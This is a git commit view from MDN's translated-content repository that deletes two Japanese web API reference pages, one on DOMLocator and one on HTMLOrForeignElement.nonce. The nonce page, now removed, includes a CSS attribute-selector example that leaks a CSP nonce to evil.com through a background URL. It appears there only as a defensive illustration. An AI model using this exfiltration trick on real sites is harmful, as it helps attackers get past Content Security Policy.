aboutsummaryrefslogtreecommitdiff
path: root/files/ja/web
diff options
context:
space:
mode:
authorMDN <actions@users.noreply.github.com>2021-07-07 00:36:00 +0000
committerMDN <actions@users.noreply.github.com>2021-07-07 00:36:00 +0000
commit751e4b6115b0d8f30a147dcba95a3e21445ba4de (patch)
tree3d63e324fe754f9b9f371f50394cfd55692ab32e /files/ja/web
parent4f70db6399a732ca7571c6c8cb952be7c9a85763 (diff)
downloadtranslated-content-751e4b6115b0d8f30a147dcba95a3e21445ba4de.tar.gz
translated-content-751e4b6115b0d8f30a147dcba95a3e21445ba4de.tar.bz2
translated-content-751e4b6115b0d8f30a147dcba95a3e21445ba4de.zip
[CRON] sync translated content
Diffstat (limited to 'files/ja/web')
-rw-r--r--files/ja/web/api/domlocator/index.html56
-rw-r--r--files/ja/web/api/htmlorforeignelement/nonce/index.html62
2 files changed, 0 insertions, 118 deletions
diff --git a/files/ja/web/api/domlocator/index.html b/files/ja/web/api/domlocator/index.html
deleted file mode 100644
index 1cc40f4afe..0000000000
--- a/files/ja/web/api/domlocator/index.html
+++ /dev/null
@@ -1,56 +0,0 @@
----
-title: DOMLocator
-slug: Web/API/DOMLocator
-tags:
- - API
- - DOM
- - DOM Reference
- - Obsolete
- - Reference
-translation_of: Web/API/DOMLocator
----
-<p>{{APIRef("DOM")}}{{obsolete_header}}</p>
-
-<div class="warning">
-<p>NOTE: これは Mozilla には実装されていません</p>
-</div>
-
-<p>エラーが発生した場所などを示します。 <code>DOMError.location</code> によって返されます。</p>
-
-<h2 id="プロパティ">プロパティ</h2>
-
-<dl>
- <dt>{{domxref("DOMLocator.lineNumber")}} {{ReadOnlyInline}}</dt>
- <dd>正の整数または-1を返します。</dd>
- <dt>{{domxref("DOMLocator.columnNumber")}} {{ReadOnlyInline}}</dt>
- <dd>正の整数または-1を返します。</dd>
- <dt>{{domxref("DOMLocator.byteOffset")}} {{ReadOnlyInline}}</dt>
- <dd>正の整数または-1を返します。</dd>
- <dt>{{domxref("DOMLocator.utf16Offset")}} {{ReadOnlyInline}}</dt>
- <dd>正の整数または-1を返します。</dd>
- <dt>{{domxref("DOMLocator.relatedNode")}} {{ReadOnlyInline}}</dt>
- <dd>正の整数または-1を返します。</dd>
- <dt>{{domxref("DOMLocator.uri")}} {{ReadOnlyInline}}</dt>
- <dd>正の整数または-1を返します。</dd>
-</dl>
-
-<h2 id="メソッド">メソッド</h2>
-
-<p><em>このインターフェイスは、メソッドを実装も継承もしません。</em></p>
-
-<h2 id="仕様">仕様</h2>
-
-<table class="standard-table">
- <tbody>
- <tr>
- <th scope="col">仕様</th>
- <th scope="col">ステータス</th>
- <th scope="col">備考</th>
- </tr>
- <tr>
- <td>{{SpecName("DOM3 Core", "core.html#Interfaces-DOMLocator", "DOMLocator")}}</td>
- <td>{{Spec2("DOM3 Core")}}</td>
- <td>初回定義</td>
- </tr>
- </tbody>
-</table>
diff --git a/files/ja/web/api/htmlorforeignelement/nonce/index.html b/files/ja/web/api/htmlorforeignelement/nonce/index.html
deleted file mode 100644
index cd64acbbb5..0000000000
--- a/files/ja/web/api/htmlorforeignelement/nonce/index.html
+++ /dev/null
@@ -1,62 +0,0 @@
----
-title: HTMLOrForeignElement.nonce
-slug: Web/API/HTMLOrForeignElement/nonce
-tags:
- - API
- - Content Security Policy
- - Experimental
- - HTML DOM
- - HTMLElement
- - Property
- - Reference
- - nonce
-translation_of: Web/API/HTMLOrForeignElement/nonce
----
-<div>{{APIRef("HTML DOM")}}</div>
-
-<p><span class="seoSummary"><strong><code>nonce</code></strong> は {{DOMxRef("HTMLOrForeignElement")}} ミックスインのプロパティで、特定のフェッチを続行できるかどうかを決定するためにコンテンツセキュリティポリシー (<a href="/ja/docs/Web/HTTP/CSP">Content Security Policy</a>) で使用される一度だけの暗号化番号を返します。</span></p>
-
-<p>後の実装では、 <code>nonce</code> 属性を持つ要素はスクリプトにのみ公開します (CSS 属性セレクターのようなサイドチャネルには公開しません)。</p>
-
-<h2 id="Examples">例</h2>
-
-<h3 id="Retrieving_a_nonce_value">ノンス値の受け取り</h3>
-
-<p>以前は、すべてのブラウザーが IDL 属性の <code>nonce</code> に対応しているわけではなかったので、回避策としては、代替として <code><a href="/ja/docs/Web/API/Element/getAttribute">getAttribute</a></code> を使用するようにしていました。</p>
-
-<pre class="brush: js">let nonce = script['nonce'] || script.getAttribute('nonce');</pre>
-
-<p>しかし、最近のバージョンのブラウザーでは、この方法でアクセスすると <code>nonce</code> の値を隠します (空の文字列が返されます)。 IDL プロパティ (<code>script['nonce']</code>) がノンスにアクセスする唯一の方法となります。</p>
-
-<p>ノンスを隠蔽することは、攻撃者が以下のようなコンテンツ属性からデータを取得できるメカニズムを介してノンスデータを流出させることを防ぐのに役立ちます。</p>
-
-<pre class="brush: css example-bad">script[nonce~=whatever] {
- background: url("https://evil.com/nonce?whatever");
-}</pre>
-
-<h2 id="Specifications">仕様書</h2>
-
-<table class="standard-table">
- <thead>
- <tr>
- <th scope="col">仕様書</th>
- </tr>
- </thead>
- <tbody>
- <tr>
- <td>{{SpecName('HTML WHATWG','#attr-nonce','nonce')}}</td>
- </tr>
- </tbody>
-</table>
-
-<h2 id="Browser_compatibility">ブラウザーの互換性</h2>
-
-<p>{{Compat("api.HTMLElement.nonce")}}</p>
-
-<h2 id="See_also">関連情報</h2>
-
-<ul>
- <li><a href="/ja/docs/Web/HTML/Global_attributes/nonce"><code>nonce</code> グローバル属性</a></li>
- <li><a href="/ja/docs/Web/HTTP/CSP">コンテンツセキュリティポリシー</a></li>
- <li>CSP: {{CSP("script-src")}}</li>
-</ul>